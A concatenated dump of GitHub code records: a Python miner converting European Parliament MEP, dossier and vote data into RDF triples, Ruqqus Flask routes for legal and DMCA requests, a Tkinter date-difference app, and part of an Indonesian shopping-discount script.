URIRef(ext_uri)))\n\n # TODO: Make this more integrated\n triples.add((mep_uri, c.SAME_AS, Miner.mep_to_lpv(mep_id)))\n\n # append to temp dictionary of processed MEPs\n self.dict_mep[mep_id] = mep_uri\n\n if \"Photo\" in mep:\n photo_url = Literal(str(mep[\"Photo\"]), datatype=c.IMAGE)\n triples.add((mep_uri, c.THUMBNAIL, photo_url))\n\n if \"Birth\" in mep:\n if \"date\" in mep[\"Birth\"]:\n birth_date = mep[\"Birth\"][\"date\"]\n if birth_date != \"\":\n birth_date = Literal(\n datetime.strptime(birth_date.split(\"T\")[0], \"%Y-%m-%d\").date(),\n datatype=c.DATE,\n )\n triples.add((mep_uri, c.BIRTH_DATE, birth_date))\n\n if \"place\" in mep[\"Birth\"]:\n birth_place = mep[\"Birth\"][\"place\"].strip().lower()\n\n # If no URIs exists, fetch any existing ones and add them to our dictionary\n if not self.uris_exist(birth_place, self.places_ext_uris):\n birth_place_uris = Miner.fetch_uris_from_name(\n birth_place, search_class=\"place\", max_results=5\n )\n self.add_uris(birth_place_uris, birth_place, self.places_ext_uris)\n\n uris = self.get_uris(birth_place, self.places_ext_uris)\n if uris:\n triples.add((mep_uri, c.BIRTH_PLACE, URIRef(uris[0])))\n\n if \"Death\" in mep:\n death_date = str(mep[\"Death\"])\n death_date = Literal(\n datetime.strptime(death_date.split(\"T\")[0], \"%Y-%m-%d\").date(),\n datatype=c.DATE,\n )\n triples.add((mep_uri, c.DEATH_DATE, death_date))\n\n # if 'active' in mep: active = mep['active'] # interesting but\n # unused atm\n\n # twitter = mep['Twitter']\n\n if \"Groups\" in mep:\n for group in mep[\"Groups\"]:\n party_id = group[\"groupid\"]\n party_title = group[\"Organization\"]\n party_uri = self.id_to_iri(party_title)\n\n party_ids = set()\n if type(party_id) is list:\n party_ids.update(party_id)\n # TODO: Link older parties to their newer version with some instance inc date if possible\n party_id = party_id[\n 0\n ] # Select the latest as the main id TODO: Improve/Check this?\n else:\n party_ids.add(party_id)\n\n # Map the ID to the internal URI\n if not self.key_exists(party_id, self.dict_parties):\n self.dict_parties[party_id] = party_uri\n\n # Link external URIs to each party id that does not yet have some\n for id_ in party_ids:\n if not self.uris_exist(id_, self.party_ext_uris):\n party_ext_uris = Miner.fetch_uris_from_name(\n party_title,\n keywords=\"european union parliament\",\n max_results=5,\n )\n self.add_uris(party_ext_uris, id_, self.party_ext_uris)\n\n # Link the internal party URI to all external counterparts\n for ext_uri in self.get_uris(party_id, self.party_ext_uris):\n triples.add((party_uri, c.SAME_AS, URIRef(ext_uri)))\n\n triples.add((party_uri, c.TYPE, c.POLITICAL_GROUP))\n\n start_date = datetime.strptime(group[\"start\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n end_date = datetime.strptime(group[\"end\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n\n membership_uri = self.id_to_iri(\n str(mep_id) + \"_\" + str(party_id) + \"_\" + str(start_date),\n prefix=\"membership\",\n )\n triples.add((membership_uri, c.START_DATE, Literal(start_date, datatype=c.DATE)))\n\n # If end date has passed\n if end_date <= date_now:\n triples.add((membership_uri, c.END_DATE, Literal(end_date, datatype=c.DATE)))\n\n triples.add((mep_uri, c.HAS_MEMBERSHIP, membership_uri))\n triples.add((membership_uri, c.IS_WITHIN, party_uri))\n\n if \"country\" in group:\n country = group[\"country\"].lower()\n\n if not self.uris_exist(country, self.places_ext_uris):\n country_ext_uris = Miner.fetch_uris_from_name(\n country, search_class=\"country\", max_results=1\n )\n self.add_uris(country_ext_uris, country, self.places_ext_uris)\n\n ext_uris = self.get_uris(country, self.places_ext_uris)\n if ext_uris:\n triples.add((membership_uri, c.REPRESENTS_COUNTRY, URIRef(ext_uris[0])))\n\n if \"role\" in group and group[\"role\"]:\n role = str(group[\"role\"])\n\n if role in c.MEMBERSHIPS:\n triples.add((membership_uri, c.TYPE, c.MEMBERSHIPS[role]))\n else:\n logging.error(\"Unknown role: %s\", role)\n else:\n logging.warning(\n \"No role found: MEP:%i start:%s party:%s. Adding as normal member.\",\n mep_id,\n group[\"start\"],\n party_title,\n )\n triples.add((membership_uri, c.TYPE, c.MEMBERSHIPS[\"Member\"]))\n\n triples.add((c.EUROPEAN_PARLIAMENT, c.IN_LEGISLATURE, party_uri))\n\n if \"Committees\" in mep:\n for committee in mep[\"Committees\"]:\n # committee_title = committee['Organization']\n\n if \"committee_id\" in committee and committee[\"committee_id\"]:\n committee_id = committee[\"committee_id\"]\n elif \"abbr\" in committee and committee[\"abbr\"]:\n committee_id = committee[\"abbr\"]\n else:\n logging.warning(\"No committee_id or abbr found. Skipping.\")\n continue\n\n committee_uri = self.id_to_iri(committee_id)\n\n triples.add((committee_uri, c.TYPE, c.COMMITTEE))\n\n if not self.key_exists(committee_id, self.dict_committees):\n self.dict_committees[committee_id] = committee_uri\n\n if not self.uris_exist(committee_id, self.committees_ext_uris):\n committee_ext_uris = Miner.fetch_uris_from_name(\n committee_id, keywords=\"european committee\", max_results=1\n )\n self.add_uris(committee_ext_uris, committee_id, self.committees_ext_uris)\n\n ext_uris = self.get_uris(committee_id, self.committees_ext_uris)\n if ext_uris:\n triples.add((committee_uri, c.SAME_AS, URIRef(ext_uris[0])))\n\n if \"role\" in committee and committee[\"role\"]:\n role = committee[\"role\"]\n\n start_date = datetime.strptime(group[\"start\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n end_date = datetime.strptime(group[\"end\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n\n membership_uri = self.id_to_iri(\n str(mep_id) + \"_\" + committee_id + \"_\" + str(start_date),\n prefix=\"membership\",\n )\n\n if role in c.MEMBERSHIPS:\n triples.add((mep_uri, c.HAS_MEMBERSHIP, membership_uri))\n triples.add((membership_uri, c.TYPE, URIRef(c.MEMBERSHIPS[role])))\n else:\n logging.error(\"Unknown role:\", role)\n else:\n logging.warning(\"No role in committee entry of MEP.\")\n\n if \"Gender\" in mep:\n gender = str(mep[\"Gender\"])\n if gender == \"M\":\n triples.add((mep_uri, c.GENDER, c.MALE))\n elif gender == \"F\":\n triples.add((mep_uri, c.GENDER, c.FEMALE))\n else:\n logging.error(\"Unknown gender:\", gender)\n else:\n logging.warning(\"No gender found: %s\" % profile_url)\n\n \"\"\"\n if 'Financial Declarations' in mep:\n declarations = mep['Financial Declarations']\n if declarations:\n print (json.dumps(declarations, indent=2))\n \"\"\"\n\n triples.add((mep_uri, c.FULL_NAME, full_name))\n triples.add((mep_uri, c.URI, profile_url))\n triples.add((mep_uri, c.OFFICE, c.MEMBER_OF_EU))\n\n return triples\n\n def convert_meps(self, path, num_threads, limit):\n start = timer()\n counter = 0\n\n selected_meps = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining MEPs...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n results = pool.map(self.process_mep, selected_meps)\n\n dataset = DatasetGenerator.get_dataset()\n for triples in results:\n for triple in triples:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n counter += 1\n\n if not self.debug:\n # Max 1000 MEPs per request\n if (counter % 1000) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, counter, \"MEPs imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", counter, \"MEPs imported.\")\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n\n return dataset.__len__(), counter, get_elapsed_seconds(start, end)\n\n def process_dossier(self, index):\n triples = set()\n\n dossier = io.load_json(os.path.join(c.DIR_DOSSIERS, str(index) + \".json\"), verbose=False)\n\n # dossier_id = dossier['_id']\n dossier_url = Literal(str(dossier[\"meta\"][\"source\"]), datatype=c.URI)\n procedure = dossier[\"procedure\"]\n\n dossier_reference = procedure[\"reference\"]\n dossier_title = Literal(str(procedure[\"title\"].strip()), datatype=c.STRING)\n # dossier_stage = Literal(str(procedure['stage_reached']), datatype=c.STRING)\n dossier_type = procedure[\"type\"]\n\n if self.key_exists(\"subtype\", procedure):\n self.list_sub_procedures.append(procedure[\"subtype\"])\n\n # TEMP\n if dossier_type not in self.list_procedures:\n self.list_procedures.append(dossier_type)\n\n dossier_uri = self.id_to_iri(dossier_reference, prefix=\"dossier\")\n\n # Append to temp dictionary of dossiers processed\n self.dict_dossier[dossier_reference] = dossier_uri\n\n # triples.add((dossier_uri, c.REACHED_STAGE, dossier_stage))\n # triples.add((dossier_uri, c.PROCEDURE_TYPE, dossier_type))\n triples.add((dossier_uri, c.TYPE, c.DOSSIER))\n triples.add((dossier_uri, c.DOSSIER_TITLE, dossier_title))\n triples.add((dossier_uri, c.URI, dossier_url))\n\n if \"geographical_area\" in procedure:\n if procedure[\"geographical_area\"]:\n geo_areas = [geo_area.lower() for geo_area in procedure[\"geographical_area\"]]\n for geo_area in geo_areas:\n if not self.uris_exist(geo_area, self.places_ext_uris):\n geo_ext_uris = Miner.fetch_uris_from_name(\n geo_area, search_class=\"place\", max_results=5\n )\n self.add_uris(geo_ext_uris, geo_area, self.places_ext_uris)\n\n ext_uris = self.get_uris(geo_area, self.places_ext_uris)\n if ext_uris:\n triples.add((dossier_uri, c.GEO_AREA, URIRef(ext_uris[0])))\n\n for activity in dossier[\"activities\"]:\n # TODO: Filter out irelevant activities\n if \"type\" in activity:\n if activity[\"type\"] is not None:\n activity_type = activity[\"type\"].lower()\n activity_id = dossier_reference + \"_\" + activity_type\n activity_uri = self.id_to_iri(activity_id, prefix=\"activity\")\n activity_date = Literal(\n datetime.strptime(activity[\"date\"].split(\"T\")[0], \"%Y-%m-%d\").date(),\n datatype=c.DATE,\n )\n\n # TEMP\n if activity_type not in self.list_activities:\n self.list_activities.append(activity_type)\n\n triples.add(\n (activity_uri, c.TYPE, c.ACTIVITY)\n ) # TODO: Make subclass according to acitvity type\n triples.add((activity_uri, c.DATE, activity_date))\n triples.add((dossier_uri, c.HAS_ACTIVITY, activity_uri))\n\n # if 'meeting_id' in activity:\n # if activity['meeting_id'] != None:\n # activity_id = int(activity['meeting_id'])\n\n if \"body\" in activity:\n if activity[\"body\"]:\n activity_body = str(activity[\"body\"])\n if (\n activity_body != \"unknown\"\n ): # TODO: Investigate why parltrack gives some as unknown\n if activity_body in c.BODIES:\n for body in c.BODIES[activity_body]:\n body_uri = body[c.PREFIX]\n\n if body_uri:\n triples.add((activity_uri, c.HAS_BODY, body_uri))\n triples.add(\n (dossier_uri, c.PROCESSED_BY, body_uri)\n ) # TODO: make this inferred?\n\n dbp_body_uri = body[\"dbpedia\"]\n if dbp_body_uri:\n triples.add(\n (body_uri, c.SAME_AS, dbp_body_uri)\n ) # TODO: check if this causes issues with duplicates\n else:\n logging.error(\"Unknown activity body '%s'\" % activity_body)\n\n if \"title\" in activity:\n activity_title = Literal(str(activity[\"title\"]), datatype=c.STRING)\n triples.add((activity_uri, c.ACTIVITY_TITLE, activity_title))\n\n if \"docs\" in activity:\n for doc in activity[\"docs\"]:\n # TODO: Filter out irelevant docs\n doc_id = doc[\"title\"]\n doc_uri = self.id_to_iri(activity_id + \"_\" + doc_id, prefix=\"document\")\n\n # Save the doc uri mapping if it does not already exist\n if doc_id not in self.dict_docs:\n self.dict_docs[doc_id] = doc_uri\n\n triples.add((activity_uri, c.HAS_DOC, doc_uri))\n triples.add((doc_uri, c.TYPE, c.DOCUMENT))\n triples.add(\n (\n doc_uri,\n c.DOCUMENT_TITLE,\n Literal(doc_id, datatype=c.STRING),\n )\n )\n\n if \"url\" in doc:\n if doc[\"url\"]:\n doc_url = Literal(str(doc[\"url\"]), datatype=c.URI)\n triples.add((doc_uri, c.URI, doc_url))\n\n if \"type\" in doc:\n if doc[\"type\"]:\n doc_type = doc[\"type\"].lower()\n triples.add(\n (\n doc_uri,\n c.DOC_TYPE,\n Literal(doc_type, datatype=c.STRING),\n )\n )\n\n # TODO: REMOVE\n if doc_type not in self.list_doc_types:\n self.list_doc_types.append(doc_type)\n else:\n logging.warning(\"Activity has no type:\", json.dumps(activity, indent=2))\n else:\n logging.warning(\"Activity has no type field!\", json.dumps(activity, indent=2))\n\n for committee in dossier[\"committees\"]:\n committee_title = committee[\"committee_full\"]\n committee_id = committee[\"committee\"]\n committee_uri = self.id_to_iri(committee_id, prefix=\"committee\")\n committee_responsible = bool(committee[\"responsible\"])\n\n if self.key_exists(\"body\", committee):\n committee_body = committee[\"body\"]\n if self.key_exists(committee_body, c.BODIES):\n for body in c.BODIES[committee_body]:\n body_uri = body[c.PREFIX]\n if body_uri:\n triples.add((committee_uri, c.HAS_BODY, body_uri))\n dbp_body_uri = body[\"dbpedia\"]\n if dbp_body_uri:\n triples.add((URIRef(body_uri), c.SAME_AS, dbp_body_uri))\n\n if committee_responsible:\n triples.add((committee_uri, c.IS_RESPONSIBLE, dossier_uri))\n else:\n triples.add((committee_uri, c.IS_INVOLVED, dossier_uri))\n\n triples.add(\n (\n committee_uri,\n c.COMMITTEE_TITLE,\n Literal(committee_title, datatype=c.STRING),\n )\n )\n\n # TODO () Figure out ID troubles (ID doesn't match current\n # dictionary)\n \"\"\"\n if 'rapporteur' in committee:\n for rapporteur in committee['rapporteur']:\n committee_rapporteur_id = str(rapporteur['mepref'])\n\n if committee_rapporteur_id in self.mep_ext_uris:\n mep_uri = URIRef(self.mep_ext_uris[committee_rapporteur_id][0])\n triples.add([committee_uri, c.HAS_RAPPORTEUR , mep_uri])\n print (mep_uri)\n else:\n print (\"MEP not found:\", committee_rapporteur_id)\n print (json.dumps(rapporteur, indent=2), \"\\n\")\n \"\"\"\n\n return triples\n\n # TODO: See if there is a better dossier url to use instead of dossier['meta']['source']\n # TODO: See if there is a better dossier text to use instead of\n # dossier['procedure']['title']\n def convert_dossiers(self, path, num_threads, limit):\n start = timer()\n counter = 0\n num_triples = 0\n\n selected_dossiers = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining Dossiers...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n results = pool.map(self.process_dossier, selected_dossiers)\n\n dataset = DatasetGenerator.get_dataset()\n for dossier in results:\n for triple in dossier:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n num_triples += len(dossier)\n counter += 1\n\n if not self.debug:\n # Max 1000 dossiers per request\n if (counter % 1000) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, counter, \"dossiers imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", counter, \"dossiers imported.\")\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n return num_triples, counter, get_elapsed_seconds(start, end)\n\n def process_votes(self, index):\n count = 0\n failed = 0\n triples = set()\n\n votes = io.load_json(os.path.join(c.DIR_VOTES, str(index) + \".json\"), verbose=False)\n\n if \"report\" in votes:\n report_id = votes[\"report\"]\n # dossier_reference = votes['epref']\n # vote_id = votes['_id']\n vote_title = votes[\"title\"]\n vote_id = Miner.format_name_string(vote_title)\n vote_uri = self.id_to_iri(vote_id, prefix=\"parlvote\")\n\n triples.add((vote_uri, c.VOTE_TITLE, Literal(vote_title, datatype=c.STRING)))\n\n if report_id in self.dict_docs:\n report_uri = URIRef(self.dict_docs[report_id])\n else:\n logging.warning(\n \"Did not find a matching report uri in dict_docs. Generating one. (This is really not ideal)\"\n )\n report_uri = self.id_to_iri(report_id, prefix=\"document\")\n\n # triples.add((vote_uri, c.BASED_ON_REPORT, report_uri))\n\n triples.add((report_uri, c.TYPE, c.REPORT))\n triples.add((vote_uri, c.IS_VOTE_FOR, report_uri))\n\n \"\"\"\n # If there's a dossier id and we processed this dossier, link the voting to the looked up URI, otherwise attempt to construct the URI and hope for the best\n if 'dossierid' in votes and self.key_exists(str(votes['dossierid']), self.dict_dossier):\n dossier_uri = self.dict_dossier[str(votes['dossierid'])]\n else:\n dossier_uri = self.id_to_iri(dossier_reference, prefix='dossier')\n \"\"\"\n\n if \"url\" in votes:\n vote_url = votes[\"url\"]\n triples.add((URIRef(vote_uri), c.URI, Literal(vote_url, datatype=c.URI)))\n\n # title = votes['title']\n # url = dossier['url']\n # ep_title = dossier['eptitle']\n\n for vote_type in c.VOTES:\n if vote_type in votes:\n for group in votes[vote_type][\"groups\"]:\n # group_name = group['group']\n for vote in group[\"votes\"]:\n try:\n if \"ep_id\" in vote:\n voter_id = vote[\"ep_id\"]\n else:\n if \"name\" in vote:\n logging.warning(\n \"MEP of vote had no epid. Do they exist? (%s). Attempting to use internal ID\",\n vote[\"name\"],\n )\n voter_id = vote[\"userid\"]\n except Exception as ex:\n logging.error(\n \"Skipping vote of type \" + vote_type + \"No MEP ID found.\"\n )\n failed += 1\n continue\n\n if self.key_exists(voter_id, self.dict_mep):\n voter_uri = URIRef(self.dict_mep[voter_id])\n else:\n voter_uri = self.id_to_iri(voter_id, prefix=\"mep\")\n\n reaction_uri = self.id_to_iri(\n report_id + \"_\" + str(voter_id) + \"_\" + vote_type,\n prefix=\"reaction\",\n )\n triples.add((reaction_uri, c.TYPE, c.VOTES[vote_type]))\n triples.add((reaction_uri, c.REACTION_TO, vote_uri))\n triples.add((reaction_uri, c.REACTION_BY, voter_uri))\n\n count += 1\n else:\n logging.warning(\"No vote type found!\")\n else:\n logging.warning(\"No report ID found (vote['report']). Skipping.\")\n\n return count, failed, triples\n\n def convert_votes(self, path, num_threads, limit):\n start = timer()\n total_success = 0\n total_failed = 0\n num_triples = 0\n counter = 0\n\n selected_votes = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining votes...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n\n results = pool.map(self.process_votes, selected_votes)\n\n dataset = DatasetGenerator.get_dataset()\n for result in results:\n count, failed, triples = result\n total_failed += failed\n total_success += count\n num_triples += len(triples)\n\n counter += 1\n\n for triple in triples:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n if not self.debug:\n if (counter % 100) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, total_success, \"votes imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", total_success, \"votes imported.\")\n\n if total_failed > 0:\n print(\n fmt.WARNING,\n \"%i out of %i votes had no MEP ID and have been excluded.\"\n % (total_failed, total_success + total_failed),\n )\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n\n return num_triples, total_success, get_elapsed_seconds(start, end)\n","repo_name":"chadsr/MAD-EUParl","sub_path":"miner/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":37617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14083598024","text":"from flask import *\nfrom os import environ\nimport requests\nfrom werkzeug.utils import secure_filename\nimport mistletoe\n\nfrom ruqqus.helpers.get import *\nfrom ruqqus.helpers.wrappers import *\nfrom ruqqus.helpers.markdown import CustomRenderer\nfrom ruqqus.helpers.sanitize import *\nfrom ruqqus.mail.mail import send_mail\nfrom ruqqus.__main__ import app, limiter\n\n\n@app.route(\"/legal\", methods=[\"GET\"])\n@auth_desired\ndef legal_1(v):\n return render_template(\"legal/legal.html\", v=v)\n\n\n@app.route(\"/legal/2\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef legal_2(v):\n\n if request.form.get(\"username\") != v.username:\n abort(422)\n\n if request.form.get(\"about_yourself\", \"\") not in [\n \"law_enforcement\", \"gov_official\"]:\n return render_template(\"legal/legal_reject.html\", v=v)\n\n req_type = request.form.get(\"request_type\", \"\")\n\n if req_type == \"user_info_baseless\":\n return render_template(\"legal/legal_reject2.html\", v=v)\n elif req_type == \"user_info_emergency\":\n return render_template(\"legal/legal_emergency.html\", v=v)\n elif req_type == \"post_takedown\":\n return render_template(\"legal/legal_takedown.html\", v=v)\n elif req_type == \"user_info_legal\":\n return render_template(\"legal/legal_user.html\", v=v)\n elif req_type == \"data_save\":\n return render_template(\"legal/legal_infosave.html\", v=v)\n else:\n abort(400)\n\n\n@app.route(\"/legal/final\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef legal_final(v):\n\n if request.form.get(\"username\") != v.username:\n abort(422)\n\n data = [(x, request.form[x]) for x in request.form if x != \"formkey\"]\n\n data = sorted(data, key=lambda x: x[0])\n\n files = {\n secure_filename(\n request.files[x].filename): request.files[x] for x in request.files}\n\n try:\n send_mail(environ.get(\"admin_email\"),\n \"Legal request submission\",\n render_template(\"email/legal.html\",\n data=data),\n files=files\n )\n except BaseException:\n return render_template(\"legal/legal_done.html\",\n success=False,\n v=v)\n\n return render_template(\"legal/legal_done.html\",\n success=True,\n v=v)\n\n\n@app.route(\"/help/dmca\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef dmca_post(v):\n\n data = {x: request.form[x] for x in request.form if x != \"formkey\"}\n\n email_text = render_template(\"help/dmca_email.md\", v=v, **data)\n\n with CustomRenderer() as renderer:\n email_html = renderer.render(mistletoe.Document(email_text))\n email_html = sanitize(email_html, linkgen=True)\n\n try:\n send_mail(environ.get(\"admin_email\"),\n \"DMCA Takedown Request\",\n email_html\n )\n except BaseException:\n return render_template(\"/help/dmca.html\",\n error=\"Unable to save your request. Please try again later.\",\n v=v)\n\n post_text = render_template(\"help/dmca_notice.md\", v=v, **data)\n with CustomRenderer() as renderer:\n post_html = renderer.render(mistletoe.Document(post_text))\n post_html = sanitize(post_html, linkgen=True)\n\n # create +RuqqusDMCA post\n new_post = Submission(author_id=1,\n domain_ref=None,\n board_id=1000,\n original_board_id=1000,\n over_18=False,\n post_public=True,\n repost_id=None,\n is_offensive=False\n )\n\n g.db.add(new_post)\n g.db.flush()\n\n new_post_aux = SubmissionAux(id=new_post.id,\n url=None,\n body=post_text,\n body_html=post_html,\n embed_url=None,\n title=f\"DMCA {new_post.base36id}\"\n )\n\n g.db.add(new_post_aux)\n g.db.flush()\n\n comment_text = f\"##### Username\\n\\n@{v.username}\\n\\n##### Email\\n\\n{v.email}\\n\\n##### Address\\n\\n{data['your_address']}\"\n with CustomRenderer() as renderer:\n c_html = renderer.render(mistletoe.Document(comment_text))\n c_html = sanitize(c_html, linkgen=True)\n\n c = Comment(author_id=1,\n parent_submission=new_post.id,\n parent_fullname=new_post.fullname,\n parent_comment_id=None,\n level=1,\n over_18=False,\n is_nsfl=False,\n is_op=True,\n is_offensive=False,\n original_board_id=1000,\n deleted_utc=int(time.time())\n )\n g.db.add(c)\n g.db.flush()\n\n c_aux = CommentAux(\n id=c.id,\n body_html=c_html,\n body=comment_text\n )\n\n g.db.add(c_aux)\n g.db.commit()\n\n return render_template(\"/help/dmca.html\",\n msg=\"Your request has been saved.\",\n v=v)\n\n\n@app.route(\"/help/counter_dmca\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef counter_dmca_post(v):\n\n data = [(x, request.form[x]) for x in request.form if x != \"formkey\"]\n data.append((\"username\", v.username))\n data.append((\"email\", v.email))\n\n data = sorted(data, key=lambda x: x[0])\n try:\n send_mail(environ.get(\"admin_email\"),\n \"DMCA Counter Notice\",\n render_template(\"email/counter_dmca.html\",\n data=data),\n plaintext=str(data)\n )\n except BaseException:\n return render_template(\"/help/counter_dmca.html\",\n error=\"Unable to save your request. Please try again later.\",\n v=v)\n\n return render_template(\"/help/counter_dmca.html\",\n msg=\"Your request has been saved.\",\n v=v)\n","repo_name":"Butonix/ruqqus-1","sub_path":"ruqqus/routes/legal.py","file_name":"legal.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"5151743508","text":"import tkinter\nfrom tkinter import ttk\nimport datetime as dt\nfrom tkinter.messagebox import *\n\ngui = tkinter.Tk()\ngui.title(\"DaysByDays\")\ngui.geometry(\"600x300\")\ngui.configure(bg=\"gray\")\n\nx = dt.date.today()\nprint(x)\nvar1 = tkinter.StringVar(value=x.strftime(\"%d\"))\nvar2 = tkinter.StringVar(value=x.strftime(\"%B\"))\nvar3 = tkinter.StringVar(value=x.year)\ncombobox1 = ttk.Combobox(gui, textvariable=var1,values=(\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\"),state=\"readonly\") \ncombobox2 = ttk.Combobox(gui, textvariable=var2,values=(\"January\", \"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"Oktober\",\"November\",\"December\"),state=\"readonly\")\ncombobox3 = ttk.Combobox(gui, textvariable=var3,values=(\"2000\",\"2001\",\"2002\",\"2003\",\"2004\",\"2005\",\"2006\",\"2007\",\"2008\",\"2009\",\"2010\",\"2011\",\"2012\",\"2013\",\"2014\",\"2015\",\"2016\",\"2017\",\"2018\",\"2019\",\"2020\",\"2021\",\"2022\",\"2023\",\"2024\",\"2025\",\"2026\",\"2027\",\"2028\",\"2029\",\"2030\"),state=\"readonly\")\ncombobox1.pack()\ncombobox2.pack()\ncombobox3.pack()\ncombobox1.place(rely=.5, relx=.100, anchor=\"w\")\ncombobox2.place(rely=.5, relx=.50, anchor=\"center\")\ncombobox3.place(rely=.5, relx=.9, anchor=\"e\")\ndef calculate():\n day = int(var1.get())\n month = str(var2.get())\n year = int(var3.get())\n global number, textInfo\n dayPicked = int(day)\n monthPicked = month\n yearPicked = int(year)\n monthNumber = int(dt.datetime.strptime(monthPicked, \"%B\").month)\n today = x\n datePicked = dt.date(yearPicked, monthNumber, dayPicked)\n difference = datePicked - today\n number = difference.days\n if number > 0:\n if number == 1:\n textInfo = \"This is \" + str(number) + \" day in the future\"\n else:\n textInfo = \"This is \" + str(number) + \" days in the future\"\n elif number < 0:\n if -number == 1:\n textInfo = \"This was \" + str(-number) + \" day ago\"\n else:\n textInfo = \"This was \" + str(-number) + \" days ago\"\n else:\n textInfo = \"This is today\"\nGoButton = tkinter.Button(\n gui,\n text=\"Go\",\n bg=\"blue\",\n fg=\"white\",\n activebackground=\"lightgreen\",\n command=lambda:[calculate(),showinfo(title=\"tijdverschil\",message=textInfo)])\nGoButton.pack()\nGoButton.place(rely=.7 ,relx=.5 ,anchor=\"s\")\ngui.mainloop()","repo_name":"Jeroen-dH/gui-formulieren","sub_path":"DaysByDays.py","file_name":"DaysByDays.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25300150086","text":"import re\r\n\r\nakhir = ('Terima kasih telah berbelanja di NFElectrics')\r\ntotal_barang = 0\r\ntotal_harga= 0\r\n\r\nwhile True:\r\n barang = input(\"Masukkan nama produk yang dibeli atau X untuk selesai:\")\r\n if (barang != \"X\"):\r\n harga = float(input(\"Harga barang:\"))\r\n print(\"Berhasil menambahkan\", barang, \"dengan harga\", harga)\r\n total_barang = total_barang + 1\r\n else:\r\n break\r\n total_harga = total_harga + harga\r\nprint(\"\")\r\nprint(\"Total produk yang dibeli:\", total_barang,\r\n \"\\n\" + \"Total harga produk:\", total_harga, \"\\n\")\r\n\r\nif total_barang != 0:\r\n anggota = input('Apakah anda anggota? (Y/T):')\r\n if anggota == 'Y':\r\n Pattern = (\"^\\w+@\\w+\\.+com+$\")\r\n def checkEmail(address):\r\n if (re.search(Pattern, address)):\r\n return address\r\n while True: \r\n email = input('Masukkan email:')\r\n if not checkEmail(email):\r\n print('Email tidak valid. Ulangi.')\r\n else:\r\n True\r\n break\r\n\r\n pola = (\"^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#!@$]).{8,}$\")\r\n def checkPass(pwd):\r\n if (re.search(pola, pwd)):\r\n return pwd\r\n while True: \r\n sandi = input('Masukkan Password:')\r\n if not checkPass(sandi):\r\n print('Email tidak valid. Ulangi.')\r\n else:\r\n True\r\n break\r\n\r\n while True:\r\n peserta = input('Masukkan level kepesertaan Anda:')\r\n diskon_10 = ('10%')\r\n diskon_15 = ('15%')\r\n diskon_5 = ('5%')\r\n diskon_20 = ('20%')\r\n if peserta == \"Gold\":\r\n if total_barang < 5:\r\n diskon = total_harga * (10/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_10)\r\n print('Total harga yang harus dibayar:', sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (15/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_15)\r\n print('Total harga yang harus dibayar:', sesudah_diskon)\r\n print(akhir)\r\n break\r\n elif peserta == \"Silver\":\r\n if total_barang < 5:\r\n diskon = total_harga * (5/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_5)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (10/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', 